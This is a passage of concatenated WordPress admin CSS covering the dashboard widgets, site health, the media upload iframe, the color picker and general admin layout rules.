#1d2327; } #dashboard_quick_press .drafts h2 { line-height: inherit; } #dashboard-widgets .inside h4, /* Back-compat for pre-4.4 */ #dashboard-widgets .inside h3 { margin-left: 0; margin-right: 0; } /* Dashboard activity widget */ #dashboard_activity .comment-meta span.approve:before { content: "\f227"; content: "\f227" / ''; font: 20px/.5 dashicons; margin-left: 5px; vertical-align: middle; position: relative; top: -1px; margin-right: 2px; } #dashboard_activity .inside { margin: 0; padding: 0 12px; } #dashboard_activity .no-activity { overflow: hidden; padding: 12px 0; text-align: center; } #dashboard_activity .no-activity p { color: #646970; font-size: 16px; } #dashboard_activity .subsubsub { float: none; border-top: 1px solid #f0f0f1; margin: 0 -12px; padding: 8px 12px 4px; } #dashboard_activity .subsubsub a .count, #dashboard_activity .subsubsub a.current .count { color: #646970; /* white background on the dashboard but #f0f0f1 on list tables */ } #future-posts ul, #published-posts ul { margin: 8px -12px 0 -12px; } #future-posts li, #published-posts li { display: grid; grid-template-columns: clamp(160px, calc(2vw + 140px), 200px) auto; column-gap: 10px; color: #646970; padding: 4px 12px; } #future-posts li:nth-child(odd), #published-posts li:nth-child(odd) { background-color: #f6f7f7; } .activity-block { border-bottom: 1px solid #f0f0f1; margin: 0 -12px 6px -12px; padding: 8px 12px 4px; } .activity-block:last-child { border-bottom: none; margin-bottom: 0; } .activity-block .subsubsub li { color: #646970; } /* Dashboard activity widget - Comments */ /* @todo: needs serious de-duplication */ #activity-widget #the-comment-list tr.undo, #activity-widget #the-comment-list div.undo { background: none; padding: 6px 0; margin-left: 12px; } #activity-widget #the-comment-list .comment-item { background: #f6f7f7; padding: 12px; position: relative; } #activity-widget #the-comment-list .avatar { position: absolute; top: 12px; } #activity-widget #the-comment-list .dashboard-comment-wrap.has-avatar { padding-left: 63px; } #activity-widget #the-comment-list .dashboard-comment-wrap blockquote { margin: 1em 0; } #activity-widget #the-comment-list .comment-item p.row-actions { margin: 4px 0 0; } #activity-widget #the-comment-list .comment-item:first-child { border-top: 1px solid #f0f0f1; } #activity-widget #the-comment-list .unapproved { background-color: #fcf9e8; } #activity-widget #the-comment-list .unapproved:before { content: ""; display: block; position: absolute; left: 0; top: 0; bottom: 0; background: #d63638; width: 4px; } #activity-widget #the-comment-list .spam-undo-inside .avatar, #activity-widget #the-comment-list .trash-undo-inside .avatar { position: relative; top: 0; } /* Browse happy box */ #dashboard-widgets #dashboard_browser_nag.postbox .inside { margin: 10px; } .postbox .button-link .edit-box { display: none; } .edit-box { opacity: 0; } .hndle:hover .edit-box, .edit-box:focus { opacity: 1; } #dashboard-widgets form .input-text-wrap input { width: 100%; } #dashboard-widgets form .textarea-wrap textarea { width: 100%; } #dashboard-widgets .postbox form .submit { float: none; margin: .5em 0 0; padding: 0; border: none; } #dashboard-widgets-wrap #dashboard-widgets .postbox form .submit #publish { min-width: 0; } #dashboard-widgets li a, #dashboard-widgets .button-link, .community-events-footer a { text-decoration: none; } #dashboard-widgets h2 a { text-decoration: underline; } #dashboard-widgets .hndle .postbox-title-action { float: right; line-height: 1.2; } #dashboard_plugins h5 { font-size: 14px; } /* Recent Comments */ #latest-comments #the-comment-list { position: relative; margin: 0 -12px; } #activity-widget #the-comment-list .comment, #activity-widget #the-comment-list .pingback { box-shadow: inset 0 1px 0 rgba(0, 0, 0, 0.06); } #activity-widget .comments #the-comment-list .alt { background-color: transparent; } #activity-widget #latest-comments #the-comment-list .comment-item { /* the row-actions paragraph is output only for users with 'edit_comment' capabilities, for other users this needs a min height equal to the gravatar image */ min-height: 50px; margin: 0; padding: 12px; } #latest-comments #the-comment-list .pingback { padding-left: 12px !important; } #latest-comments #the-comment-list .comment-item:first-child { border-top: none; } #latest-comments #the-comment-list .comment-meta { line-height: 1.5; margin: 0; color: #646970; } #latest-comments #the-comment-list .comment-meta cite { font-style: normal; font-weight: 400; } #latest-comments #the-comment-list .comment-item blockquote, #latest-comments #the-comment-list .comment-item blockquote p { margin: 0; padding: 0; display: inline; } #latest-comments #the-comment-list .comment-item p.row-actions { margin: 3px 0 0; padding: 0; font-size: 13px; } /* Feeds */ .rss-widget ul { margin: 0; padding: 0; list-style: none; } a.rsswidget { font-size: 13px; font-weight: 600; line-height: 1.4; } .rss-widget ul li { line-height: 1.5; margin-bottom: 12px; } .rss-widget span.rss-date { color: #646970; font-size: 13px; margin-left: 3px; } .rss-widget cite { display: block; text-align: right; margin: 0 0 1em; padding: 0; } .rss-widget cite:before { content: "\2014"; content: "\2014" / ''; } .dashboard-comment-wrap { word-wrap: break-word; } /* Browser Nag */ #dashboard_browser_nag a.update-browser-link { font-size: 1.2em; font-weight: 600; } #dashboard_browser_nag a { text-decoration: underline; } #dashboard_browser_nag p.browser-update-nag.has-browser-icon { padding-right: 128px; } #dashboard_browser_nag .browser-icon { margin-top: -32px; } #dashboard_browser_nag.postbox { background-color: #b32d2e; background-image: none; border-color: #b32d2e; color: #fff; box-shadow: none; } #dashboard_browser_nag.postbox h2 { border-bottom-color: transparent; background: transparent none; color: #fff; box-shadow: none; } #dashboard_browser_nag a { color: #fff; } #dashboard_browser_nag.postbox .postbox-header { border-color: transparent; } #dashboard_browser_nag h2.hndle { border: none; font-weight: 600; font-size: 20px; padding-top: 10px; } .postbox#dashboard_browser_nag p a.dismiss { font-size: 14px; } .postbox#dashboard_browser_nag p, .postbox#dashboard_browser_nag a, .postbox#dashboard_browser_nag p.browser-update-nag { font-size: 16px; } /* PHP Nag */ #dashboard_php_nag .dashicons-warning { color: #dba617; padding-right: 6px; } #dashboard_php_nag.php-no-security-updates .dashicons-warning, #dashboard_php_nag.php-version-lower-than-future-minimum .dashicons-warning { color: #d63638; } #dashboard_php_nag h2 { display: inline-block; } #dashboard_php_nag p { margin: 12px 0; } .bigger-bolder-text { font-weight: 600; font-size: 14px; } /* =Media Queries -------------------------------------------------------------- */ @media only screen and (min-width: 1600px) { .welcome-panel .welcome-panel-column-container { display: flex; justify-content: center; } .welcome-panel-column { width: 100%; max-width: 460px; } } /* one column on the dash */ @media only screen and (max-width: 799px) { #wpbody-content #dashboard-widgets .postbox-container { width: 100%; } #dashboard-widgets .meta-box-sortables { min-height: 0; } .is-dragging-metaboxes #dashboard-widgets .meta-box-sortables { min-height: 100px; } #dashboard-widgets .meta-box-sortables.empty-container { margin-bottom: 0; } } /* two columns on the dash, but keep the setting if one is selected */ @media only screen and (min-width: 800px) and (max-width: 1499px) { #wpbody-content #dashboard-widgets .postbox-container { width: 49.5%; } #wpbody-content #dashboard-widgets #postbox-container-2, #wpbody-content #dashboard-widgets #postbox-container-3, #wpbody-content #dashboard-widgets #postbox-container-4 { float: right; width: 50.5%; } #dashboard-widgets #postbox-container-3 .empty-container, #dashboard-widgets #postbox-container-4 .empty-container { border: none; height: 0; min-height: 0; margin-bottom: 0; display: none; } #dashboard-widgets #postbox-container-3 .empty-container:after, #dashboard-widgets #postbox-container-4 .empty-container:after { display: none; } #wpbody #wpbody-content #dashboard-widgets.columns-1 .postbox-container { width: 100%; } #wpbody #dashboard-widgets .metabox-holder.columns-1 .postbox-container .empty-container { border: none; height: 0; min-height: 0; margin-bottom: 0; } /* show the radio buttons for column prefs only for one or two columns */ .index-php .screen-layout, .index-php .columns-prefs { display: block; } .columns-prefs .columns-prefs-3, .columns-prefs .columns-prefs-4 { display: none; } #dashboard-widgets .postbox-container .empty-container:after { display: block; } } /* three columns on the dash */ @media only screen and (min-width: 1500px) and (max-width: 1800px) { #wpbody-content #dashboard-widgets .postbox-container { width: 33.5%; } #wpbody-content #dashboard-widgets #postbox-container-1 { width: 33%; } #wpbody-content #dashboard-widgets #postbox-container-3, #wpbody-content #dashboard-widgets #postbox-container-4 { float: right; } #dashboard-widgets #postbox-container-4 .empty-container { border: none; height: 0; min-height: 0; margin-bottom: 0; display: none; } #dashboard-widgets #postbox-container-4 .empty-container:after { display: none; } #dashboard-widgets .postbox-container .empty-container:after { display: block; } } /* Always show the "Drag boxes here" CSS generated content on large screens. */ @media only screen and (min-width: 1801px) { #dashboard-widgets .postbox-container .empty-container:after { display: block; } } @media screen and (max-width: 870px) { /* @deprecated 5.9.0 -- Lists removed from welcome panel. */ .welcome-panel .welcome-panel-column li { display: inline-block; margin-right: 13px; } /* @deprecated 5.9.0 -- Lists removed from welcome panel. */ .welcome-panel .welcome-panel-column ul { margin: 0.4em 0 0; } } @media screen and (max-width: 1180px) and (min-width: 783px) { .welcome-panel-column { grid-template-columns: 1fr; } [class*="welcome-panel-icon"], .welcome-panel-column > svg { display: none; } } @media screen and (max-width: 782px) { .welcome-panel .welcome-panel-column-container { grid-template-columns: 1fr; box-sizing: border-box; padding: 32px; width: 100%; } .welcome-panel .welcome-panel-column-content { max-width: 520px; } /* Keep the close icon from overlapping the Welcome text. */ .welcome-panel .welcome-panel-close { overflow: hidden; text-indent: 40px; white-space: nowrap; width: 20px; height: 20px; padding: 5px; top: 5px; right: 5px; } .welcome-panel .welcome-panel-close::before { position: absolute; top: 5px; left: -35px; } #dashboard-widgets h2 { padding: 12px; } #dashboard_recent_comments #the-comment-list .comment-item .avatar { height: 30px; width: 30px; margin: 4px 10px 5px 0; } .community-events-toggle-location { height: 38px; vertical-align: baseline; } #community-events-submit { margin-bottom: 0; } .community-events-form label, #dashboard-widgets .community-events-cancel.button-link { /* Same properties as the submit button for cross-browsers alignment. */ font-size: 14px; line-height: normal; padding: 6px 0; border: 1px solid transparent; } } /* Smartphone */ @media screen and (max-width: 600px) { .welcome-panel-header { padding: 32px 32px 64px; } .welcome-panel-header-image { display: none; } } @media screen and (max-width: 480px) { .welcome-panel-column { gap: 16px; } } @media screen and (max-width: 360px) { .welcome-panel-column { grid-template-columns: 1fr; } [class*="welcome-panel-icon"], .welcome-panel-column > svg { display: none; } } @media screen and (min-width: 355px) { .community-events .event-info { display: table-row; float: left; max-width: 59%; } .event-icon, .event-icon[aria-hidden="true"] { display: table-cell; } .event-info-inner { display: table-cell; } .community-events .event-date-time { float: right; max-width: 39%; } .community-events .event-date, .community-events .event-time { text-align: right; } } /*! This file is auto-generated */ .health-check-body h2{line-height:1.4}.health-check-body h3{padding:0;font-weight:400}.site-health-progress-wrapper{margin-bottom:1rem}.site-health-progress{display:inline-block;height:20px;width:20px;margin:0;border-radius:100%;position:relative;font-weight:600;font-size:.4rem}.site-health-progress-count{position:absolute;display:block;height:80px;width:80px;left:50%;top:50%;margin-top:-40px;margin-left:-40px;border-radius:100%;line-height:6.3;font-size:2em}.loading .site-health-progress svg #bar{stroke-dashoffset:0;stroke:#c3c4c7;animation:loadingPulse 3s infinite ease-in-out}.site-health-progress svg circle{stroke-dashoffset:0;transition:stroke-dashoffset 1s linear;stroke:#c3c4c7;stroke-width:2em}.site-health-progress svg #bar{stroke-dashoffset:565;stroke:#d63638}.green .site-health-progress #bar{stroke:#00a32a}.green .site-health-progress .site-health-progress-label{color:#00a32a}.orange .site-health-progress #bar{stroke:#dba617}.orange .site-health-progress .site-health-progress-label{color:#dba617}.site-health-progress-label{font-weight:600;line-height:20px;margin-left:.3rem}@keyframes loadingPulse{0%{stroke:#c3c4c7}50%{stroke:var(--wp-admin-theme-color)}100%{stroke:#c3c4c7}}.health-check-tabs-wrapper{display:-ms-inline-grid;-ms-grid-columns:1fr 1fr 1fr 1fr;vertical-align:top;display:inline-grid;grid-template-columns:1fr 1fr 1fr 1fr}.health-check-tabs-wrapper.tab-count-1{grid-template-columns:1fr}.health-check-tabs-wrapper.tab-count-2{grid-template-columns:1fr 1fr}.health-check-tabs-wrapper.tab-count-3{grid-template-columns:1fr 1fr 1fr}.health-check-tab{display:block;text-decoration:none;color:inherit;padding:.5rem 1rem 1rem;margin:0 1rem;transition:box-shadow .5s ease-in-out}.health-check-offscreen-nav-wrapper{position:relative;background:0 0;border:none}.health-check-offscreen-nav-wrapper:focus .health-check-offscreen-nav{left:initial}.health-check-offscreen-nav{display:none;position:absolute;padding-top:10px;right:0;top:100%;width:13rem}.health-check-offscreen-nav-wrapper.visible .health-check-offscreen-nav{display:inline-block}.health-check-offscreen-nav:before{position:absolute;content:"";width:0;height:0;border-style:solid;border-width:0 10px 5px;border-color:transparent transparent #fff;right:20px;top:5px}.health-check-offscreen-nav .health-check-tab{background:#fff;box-shadow:0 2px 5px 0 rgba(0,0,0,.75)}.health-check-offscreen-nav .health-check-tab.active{box-shadow:inset 3px 0 #3582c4;font-weight:600}.health-check-body{max-width:800px;margin:0 auto}.widefat.health-check-table th{font-size:13px}.health-check-table td:first-child{width:30%}.health-check-table td{width:70%}.health-check-table ol,.health-check-table ul{margin:0}.health-check-body li{line-height:1.5}.health-check-body .good::before,.health-check-body .pass::before{content:"\f147";content:"\f147"/'';color:#00a32a}.health-check-body .warning::before{content:"\f460";content:"\f460"/'';color:#dba617}.health-check-body .info::before{content:"\f348";content:"\f348"/'';color:#72aee6}.health-check-body .error::before,.health-check-body .fail::before{content:"\f335";content:"\f335"/'';color:#d63638}.site-health-copy-buttons{margin:1rem 0}.site-health-copy-buttons .copy-button-wrapper{display:inline-flex;align-items:center;margin:.5rem 0 1rem}.site-health-copy-buttons .success{color:#007017;margin-left:.5rem}.site-status-has-issues.hide{display:none}.site-health-view-more{text-align:center}.site-health-issues-wrapper:first-of-type{margin-top:3rem}.site-health-issues-wrapper{margin-bottom:3rem;margin-top:2rem}.site-status-all-clear{display:flex;flex-direction:column;align-items:center;justify-content:center;text-align:center;height:100%;width:100%;margin:0 0 3rem}@media all and (min-width:784px){.site-status-all-clear{margin:2rem 0 5rem}}.site-status-all-clear.hide{display:none}.site-status-all-clear .dashicons{font-size:150px;height:150px;margin-bottom:2rem;width:150px}.site-status-all-clear .encouragement{font-size:1.5rem;font-weight:600}.site-status-all-clear p{margin:0}.wp-core-ui .button.site-health-view-passed{position:relative;padding-right:40px;padding-left:20px}.health-check-wp-paths-sizes.spinner{visibility:visible;float:none;margin:0 4px;flex-shrink:0}#dashboard_site_health .site-health-details{padding-left:16px}#dashboard_site_health .site-health-details p:first-child{margin-top:0}#dashboard_site_health .site-health-details p:last-child{margin-bottom:0}#dashboard_site_health .health-check-widget{display:grid;grid-template-columns:1fr 2fr;grid-auto-rows:minmax(64px,auto);column-gap:16px;align-items:center}#dashboard_site_health .site-health-progress-label{margin-left:0}.health-check-widget-title-section{margin-bottom:0;text-align:center}@media screen and (max-width:480px){#dashboard_site_health .health-check-widget{grid-template-columns:100%}}@media screen and (max-width:782px){.site-health-issues-wrapper .health-check-accordion-trigger{flex-direction:column;align-items:flex-start}.health-check-accordion-trigger .badge{margin:1em 0 0}.health-check-table{table-layout:fixed}.health-check-table td,.health-check-table th{box-sizing:border-box;display:block;width:100%;word-wrap:break-word}.health-check-table td:first-child,.widefat.health-check-table th{width:100%;padding-bottom:0;font-weight:600}.wp-core-ui .site-health-copy-buttons .copy-button{margin-bottom:0}}/* Styles for the media library iframe (not used on the Library screen) */ div#media-upload-header { margin: 0; padding: 5px 5px 0; font-weight: 600; position: relative; border-bottom: 1px solid #dcdcde; background: #f6f7f7; } #sidemenu { overflow: hidden; float: none; position: relative; left: 0; bottom: -1px; margin: 0 5px; padding-left: 10px; list-style: none; font-size: 12px; font-weight: 400; } #sidemenu a { padding: 0 7px; display: block; float: left; line-height: 28px; border-top: 1px solid #f6f7f7; border-bottom: 1px solid #dcdcde; background-color: #f6f7f7; text-decoration: none; transition: none; } #sidemenu li { display: inline; line-height: 200%; list-style: none; text-align: center; white-space: nowrap; margin: 0; padding: 0; } #sidemenu a.current { font-weight: 400; padding-left: 6px; padding-right: 6px; border: 1px solid #dcdcde; border-bottom-color: #f0f0f1; background-color: #f0f0f1; color: #000; } #media-upload:after { /* clearfix */ content: ""; display: table; clear: both; } #media-upload .slidetoggle { border-top-color: #dcdcde; } #media-upload input[type="radio"] { padding: 0; } .media-upload-form label.form-help, td.help { color: #646970; } form { margin: 1em; } #search-filter { text-align: right; } th { position: relative; } .media-upload-form label.form-help, td.help { font-family: sans-serif; font-style: italic; font-weight: 400; } .media-upload-form p.help { margin: 0; padding: 0; } .media-upload-form fieldset { width: 100%; border: none; text-align: justify; margin: 0 0 1em; padding: 0; } /* specific to the image upload form */ .image-align-none-label { background: url(../images/align-none.png) no-repeat center left; } .image-align-left-label { background: url(../images/align-left.png) no-repeat center left; } .image-align-center-label { background: url(../images/align-center.png) no-repeat center left; } .image-align-right-label { background: url(../images/align-right.png) no-repeat center left; } tr.image-size td { width: 460px; } tr.image-size div.image-size-item { margin: 0 0 5px; } #library-form .progress, #gallery-form .progress, .insert-gallery, .describe.startopen, .describe.startclosed { display: none; } .media-item .thumbnail { max-width: 128px; max-height: 128px; } thead.media-item-info tr { background-color: transparent; } .form-table thead.media-item-info { border: 8px solid #fff; } abbr.required, span.required { text-decoration: none; border: none; } .describe label { display: inline; } .describe td.error { padding: 2px 8px; } .describe td.A1 { width: 132px; } .describe input[type="text"], .describe textarea { width: 460px; border-width: 1px; border-style: solid; } /* Specific to Uploader */ #media-upload p.ml-submit { padding: 1em 0; } #media-upload p.help, #media-upload label.help { font-family: sans-serif; font-style: italic; font-weight: 400; } #media-upload .ui-sortable .media-item { cursor: move; } #media-upload tr.image-size { margin-bottom: 1em; height: 3em; } #media-upload #filter { width: 623px; } #media-upload #filter .subsubsub { margin: 8px 0; } #media-upload .tablenav-pages a, #media-upload .tablenav-pages .current { display: inline-block; padding: 4px 5px 6px; font-size: 16px; line-height: 1; text-align: center; text-decoration: none; } #media-upload .tablenav-pages a { min-width: 17px; border: 1px solid #c3c4c7; background: #f6f7f7; } #filter .tablenav select { border-style: solid; border-width: 1px; padding: 2px; vertical-align: top; width: auto; } #media-upload .del-attachment { display: none; margin: 5px 0; } .menu_order { float: right; font-size: 11px; margin: 8px 10px 0; } .menu_order_input { border: 1px solid #dcdcde; font-size: 10px; padding: 1px; width: 23px; } .ui-sortable-helper { background-color: #fff; border: 1px solid #a7aaad; opacity: 0.6; filter: alpha(opacity=60); } #media-upload th.order-head { width: 20%; text-align: center; } #media-upload th.actions-head { width: 25%; text-align: center; } #media-upload a.wp-post-thumbnail { margin: 0 20px; } #media-upload .widefat { border-style: solid solid none; } .sorthelper { height: 37px; width: 623px; display: block; } #gallery-settings th.label { width: 160px; } #gallery-settings #basic th.label { padding: 5px 5px 5px 0; } #gallery-settings .title { clear: both; padding: 0 0 3px; font-size: 1.6em; border-bottom: 1px solid #dcdcde; } h3.media-title { font-size: 1.6em; } h4.media-sub-title { border-bottom: 1px solid #dcdcde; font-size: 1.3em; margin: 12px; padding: 0 0 3px; } #gallery-settings .title, h3.media-title, h4.media-sub-title { font-family: Georgia,"Times New Roman",Times,serif; font-weight: 400; color: #50575e; } #gallery-settings .describe td { vertical-align: middle; height: 3em; } #gallery-settings .describe th.label { padding-top: .5em; text-align: left; } #gallery-settings .describe { padding: 5px; width: 100%; clear: both; cursor: default; background: #fff; } #gallery-settings .describe select { width: 15em; } #gallery-settings .describe select option, #gallery-settings .describe td { padding: 0; } #gallery-settings label, #gallery-settings legend { font-size: 13px; color: #3c434a; margin-right: 15px; } #gallery-settings .align .field label { margin: 0 1em 0 3px; } #gallery-settings p.ml-submit { border-top: 1px solid #dcdcde; } #gallery-settings select#columns { width: 6em; } #sort-buttons { font-size: 0.8em; margin: 3px 25px -8px 0; text-align: right; max-width: 625px; } #sort-buttons a { text-decoration: none; } #sort-buttons #asc, #sort-buttons #showall { padding-left: 5px; } #sort-buttons span { margin-right: 25px; } p.media-types { margin: 0; padding: 1em; } p.media-types-required-info { padding-top: 0; } tr.not-image { display: none; } table.not-image tr.not-image { display: table-row; } table.not-image tr.image-only { display: none; } /** * HiDPI Displays */ @media print, (min-resolution: 120dpi) { .image-align-none-label { background-image: url(../images/align-none-2x.png?ver=20120916); background-size: 21px 15px; } .image-align-left-label { background-image: url(../images/align-left-2x.png?ver=20120916); background-size: 22px 15px; } .image-align-center-label { background-image: url(../images/align-center-2x.png?ver=20120916); background-size: 21px 15px; } .image-align-right-label { background-image: url(../images/align-right-2x.png?ver=20120916); background-size: 22px 15px; } } /*! This file is auto-generated */ .farbtastic{position:relative}.farbtastic *{position:absolute;cursor:crosshair}.farbtastic,.farbtastic .wheel{width:195px;height:195px}.farbtastic .color,.farbtastic .overlay{top:47px;left:47px;width:101px;height:101px}.farbtastic .wheel{background:url(../images/wheel.png) no-repeat;width:195px;height:195px}.farbtastic .overlay{background:url(../images/mask.png) no-repeat}.farbtastic .marker{width:17px;height:17px;margin:-8px 0 0 -8px;overflow:hidden;background:url(../images/marker.png) no-repeat}/* 2 column liquid layout */ #wpwrap { height: auto; min-height: 100%; width: 100%; position: relative; -webkit-font-smoothing: subpixel-antialiased; } #wpcontent { height: 100%; padding-left: 20px; } #wpcontent, #wpfooter { margin-left: 160px; } .folded #wpcontent, .folded #wpfooter { margin-left: 36px; } #wpbody-content { padding-bottom: 65px; float: left; width: 100%; overflow: visible; } /* inner 2 column liquid layout */ .inner-sidebar { float: right; clear: right; display: none; width: 281px; position: relative; } .columns-2 .inner-sidebar { margin-right: auto; width: 286px; display: block; } .inner-sidebar #side-sortables, .columns-2 .inner-sidebar #side-sortables { min-height: 300px; width: 280px; padding: 0; } .has-right-sidebar .inner-sidebar { display: block; } .has-right-sidebar #post-body { float: left; clear: left; width: 100%; margin-right: -2000px; } .has-right-sidebar #post-body-content { margin-right: 300px; float: none; width: auto; } /* 2 columns main area */ #col-left { float: left; width: 35%; } #col-right { float: right; width: 65%; } #col-left .col-wrap { padding: 0 6px 0 0; } #col-right .col-wrap { padding: 0 0 0 6px; } /* utility classes */ .alignleft { float: left; } .alignright { float: right; } .textleft { text-align: left; } .textright { text-align: right; } .clear { clear: both; } /* modern clearfix */ .wp-clearfix:after { content: ""; display: table; clear: both; } /* Hide visually but not from screen readers */ .screen-reader-text, .screen-reader-text span, .ui-helper-hidden-accessible { border: 0; clip-path: inset(50%); height: 1px; margin: -1px; overflow: hidden; padding: 0; position: absolute; width: 1px; /* Many screen reader and browser combinations announce broken words as they would appear visually. */ word-wrap: normal !important; word-break: normal !important; } .button .screen-reader-text { height: auto; /* Fixes a Safari+VoiceOver bug, see ticket #42006 */ } .screen-reader-text + .dashicons-external { margin-top: -1px; margin-left: 2px; text-decoration: none; } .screen-reader-shortcut { position: absolute; top: -1000em; left: 6px; height: auto; width: auto; display: block; font-size: 14px; font-weight: 600; padding: 15px 23px 14px; /* Background and color set to prevent false positives in automated accessibility tests. */ background: #ffffff; color: var(--wp-admin-theme-color, #3858e9); z-index: 100000; line-height: normal; } .screen-reader-shortcut:focus { top: -25px; /* Overrides a:focus in the admin. See ticket #56789. */ color: var(--wp-admin-theme-color, #3858e9); box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color, #3858e9); text-decoration: none; /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; outline-offset: -2px; } .hidden, .js .closed .inside, .js .hide-if-js, .no-js .hide-if-no-js, .js.wp-core-ui .hide-if-js, .js .wp-core-ui .hide-if-js, .no-js.wp-core-ui .hide-if-no-js, .no-js .wp-core-ui .hide-if-no-js { display: none; } /* @todo: Take a second look. Large chunks of shared color, from the colors.css merge */ .widget-top, .menu-item-handle, .widget-inside, #menu-settings-column .accordion-container, #menu-management .menu-edit, .manage-menus, table.widefat, .stuffbox, p.popular-tags, .widgets-holder-wrap, .wp-editor-container, .popular-tags, .feature-filter, .comment-ays { border: 1px solid #c3c4c7; box-shadow: 0 1px 1px rgba(0, 0, 0, 0.04); } table.widefat, .wp-editor-container, .stuffbox, p.popular-tags, .widgets-holder-wrap, .popular-tags, .feature-filter, .comment-ays { background: #fff; } /* general */ html, body { height: 100%; margin: 0; padding: 0; } body { background: #f0f0f1; color: #3c434a; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif; font-size: 13px; line-height: 1.4em; min-width: 600px; } body.iframe { min-width: 0; padding-top: 1px; } body.modal-open { overflow: hidden; } body.mobile.modal-open #wpwrap { overflow: hidden; position: fixed; height: 100%; } iframe, img { border: 0; } td { font-family: inherit; font-size: inherit; font-weight: inherit; line-height: inherit; } /* Any change to the default link style must be applied to button-link too. */ a { color: #2271b1; transition-property: border, background, color; transition-duration: .05s; transition-timing-function: ease-in-out; } a, div { outline: 0; } a:hover, a:active { color: #135e96; } a:focus, a:focus .media-icon img, a:focus .plugin-icon, .wp-person a:focus .gravatar { color: #043959; border-radius: 2px; box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color, #3858e9); /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; } #adminmenu a:focus { box-shadow: none; /* Only visible in Windows High Contrast mode */ outline: 1px solid transparent; outline-offset: -1px; } .screen-reader-text:focus { box-shadow: none; outline: none; } blockquote, q { quotes: none; } blockquote:before, blockquote:after, q:before, q:after { content: ""; content: none; } p, .wp-die-message { font-size: 13px; line-height: 1.5; margin: 1em 0; } blockquote { margin: 1em; } li, dd { margin-bottom: 6px; } h1, h2, h3, h4, h5, h6 { display: block; font-weight: 600; } h1 { color: #1d2327; font-size: 2em; margin: .67em 0; } h2, h3 { color: #1d2327; font-size: 1.3em; margin: 1em 0; } .update-core-php h2 { margin-top: 4em; } .update-php h2, .update-messages h2, h4 { font-size: 1em; margin: 1.33em 0; } h5 { font-size: 0.83em; margin: 1.67em 0; } h6 { font-size: 0.67em; margin: 2.33em 0; } ul, ol { padding: 0; } ul { list-style: none; } ol { list-style-type: decimal; margin-left: 2em; } ul.ul-disc { list-style: disc outside; } ul.ul-square { list-style: square outside; } ol.ol-decimal { list-style: decimal outside; } ul.ul-disc, ul.ul-square, ol.ol-decimal { margin-left: 1.8em; } ul.ul-disc > li, ul.ul-square > li, ol.ol-decimal > li { margin: 0 0 0.5em; } /* rtl:ignore */ .ltr { direction: ltr; } /* rtl:ignore */ .code, code { font-family: Consolas, Monaco, monospace; direction: ltr; unicode-bidi: embed; } kbd, code { padding: 3px 5px 2px; margin: 0 1px; background: #f0f0f1; background: rgba(0, 0, 0, 0.07); font-size: 13px; } .subsubsub { list-style: none; margin: 8px 0 0; padding: 0; font-size: 13px; float: left; color: #646970; } .subsubsub a { line-height: 2; padding: .2em; text-decoration: none; } .subsubsub a .count, .subsubsub a.current .count { color: #50575e; /* #f1f1f1 background */ font-weight: 400; } .subsubsub a.current { font-weight: 600; border: none; } .subsubsub li { display: inline-block; margin: 0; padding: 0; white-space: nowrap; } /* .widefat - main style for tables */ .widefat { border-spacing: 0; width: 100%; clear: both; margin: 0; } .widefat * { word-wrap: break-word; } .widefat a, .widefat button.button-link { text-decoration: none; } .widefat td, .widefat th { padding: 8px 10px; } .widefat thead th, .widefat thead td { border-bottom: 1px solid #c3c4c7; } .widefat tfoot th, .widefat tfoot td { border-top: 1px solid #c3c4c7; border-bottom: none; } .widefat .no-items td { border-bottom-width: 0; } .widefat td { vertical-align: top; } .widefat td, .widefat td p, .widefat td ol, .widefat td ul { font-size: 13px; line-height: 1.5em; } .widefat th, .widefat thead td, .widefat tfoot td { text-align: left; line-height: 1.3em; font-size: 14px; } .widefat th input, .updates-table td input, .widefat thead td input, .widefat tfoot td input { margin: 0 0 0 8px; padding: 0; vertical-align: text-top; } .widefat .check-column { width: 2.2em; padding: 6px 0 25px; vertical-align: top; } .widefat tbody th.check-column { padding: 9px 0 22px; } .widefat thead td.check-column, .widefat tbody th.check-column, .updates-table tbody td.check-column, .widefat tfoot td.check-column { padding: 11px 0 0 3px; } .widefat thead td.check-column, .widefat tfoot td.check-column { padding-top: 4px; vertical-align: middle; } .update-php div.updated, .update-php div.error { margin-left: 0; } .js-update-details-toggle .dashicons { text-decoration: none; } .js-update-details-toggle[aria-expanded="true"] .dashicons::before { content: "\f142"; content: "\f142" / ''; } .no-js .widefat thead .check-column input, .no-js .widefat tfoot .check-column input { display: none; } .widefat .num, .column-comments, .column-links, .column-posts { text-align: center; } .widefat th#comments { vertical-align: middle; } .wrap { margin: 10px 20px 0 2px; } .wrap > h2:first-child, /* Back-compat for pre-4.4 */ .wrap [class$="icon32"] + h2, /* Back-compat for pre-4.4 */ .postbox .inside h2, /* Back-compat for pre-4.4 */ .wrap h1 { font-size: 23px; font-weight: 400; margin: 0; padding: 9px 0 4px; line-height: 1.3; } .wrap h1.wp-heading-inline { display: inline-block; margin-right: 5px; } .wp-header-end { visibility: hidden; margin: -2px 0 0; } .subtitle { margin: 0; padding-left: 25px; color: #50575e; font-size: 14px; font-weight: 400; line-height: 1; } .subtitle strong { word-break: break-all; } .wrap .add-new-h2, /* deprecated */ .wrap .add-new-h2:active, /* deprecated */ .wrap .page-title-action, .wrap .page-title-action:active { display: inline-block; position: relative; box-sizing: border-box; cursor: pointer; white-space: nowrap; text-decoration: none; text-shadow: none; top: -3px; margin-left: 4px; border: 1px solid #2271b1; border-radius: 2px; background: transparent; font-size: 13px; font-weight: 500; min-height: 32px; line-height: 2.30769231; /* 30px for 32px height */ color: #2271b1; /* use the standard color used for buttons */ padding: 0 12px; -webkit-appearance: none; } .wrap .wp-heading-inline + .page-title-action { margin-left: 0; } .wrap .add-new-h2:hover, /* deprecated */ .wrap .page-title-action:hover { border-color: #0a4b78; color: #0a4b78; } /* lower specificity: color needs to be overridden by :hover and :active */ .page-title-action:focus { color: #0a4b78; } /* Dashicon for language options on General Settings and Profile screens */ .form-table th label[for="locale"] .dashicons, .form-table th label[for="WPLANG"] .dashicons { margin-left: 5px; } .wrap .page-title-action:focus { border-color: #3582c4; box-shadow: 0 0 0 1px #3582c4; /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; } .wrap h1.long-header { padding-right: 0; } .wp-dialog { background-color: #fff; } .widgets-chooser ul, #widgets-left 